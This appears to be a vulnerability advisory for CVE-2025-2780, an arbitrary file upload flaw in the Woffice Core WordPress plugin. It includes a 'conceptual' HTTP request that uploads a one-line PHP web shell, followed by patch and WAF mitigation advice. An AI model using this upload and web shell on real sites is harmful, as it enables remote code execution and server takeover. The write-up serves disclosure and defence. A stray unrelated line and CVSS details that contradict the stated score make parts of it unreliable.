Overview
In the realm of cybersecurity, a new vulnerability has been identified in the Woffice Core plugin for WordPress, used by the Woffice Theme. This vulnerability, designated as CVE-2025-2780, poses a critical threat to any WordPress site utilizing the plugin. It allows authenticated attackers with Subscriber-level access and above to upload arbitrary files, potentially leading to remote code execution and complete system compromise. Given the widespread use of the Woffice Theme, it is crucial for administrators and users to understand the implications of this vulnerability and take necessary steps to mitigate its potential impact.
Vulnerability Summary
CVE ID: CVE-2025-2780
Severity: Critical (CVSS: 9.8)
Attack Vector: Network
Privileges Required: Low (Subscriber-level access)
User Interaction: Required
Impact: Potential system compromise or data leakage
Affected Products
No phone number, email, or personal info required.
Product | Affected Versions
Woffice Core Plugin for WordPress | Up to and including 5.4.21
How the Exploit Works
The root of this vulnerability lies in the ‘saveFeaturedImage’ function of the Woffice Core plugin. This function lacks proper file type validation, allowing authenticated users to upload arbitrary files to the server. An attacker with Subscriber-level access or higher could exploit this vulnerability by uploading a malicious script or executable file, which could then be invoked to achieve remote code execution. This could potentially lead to full system compromise, data theft, or other damaging consequences.
Conceptual Example Code
Below is a conceptual example of how the vulnerability might be exploited. In this case, the attacker sends a POST request to the server with a malicious file:
POST /wp-content/plugins/woffice-core/inc/ajax.php?function=saveFeaturedImage HTTP/1.1
Host: target.example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/php
<?php system($_GET['cmd']); ?>
------WebKitFormBoundary7MA4YWxkTrZu0gW--In the above example, the attacker is uploading a PHP file named ‘exploit.php’ which, when executed on the server, will run any command passed to it via the ‘cmd’ GET parameter.
Mitigation Guidance
The most effective mitigation for this vulnerability is to apply the vendor’s patch. If for some reason applying the patch is not feasible, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can serve as a temporary mitigation measure. These systems can be configured to block or alert on attempts to upload files via the ‘saveFeaturedImage’ function. It is also advisable to regularly monitor server logs for suspicious activity.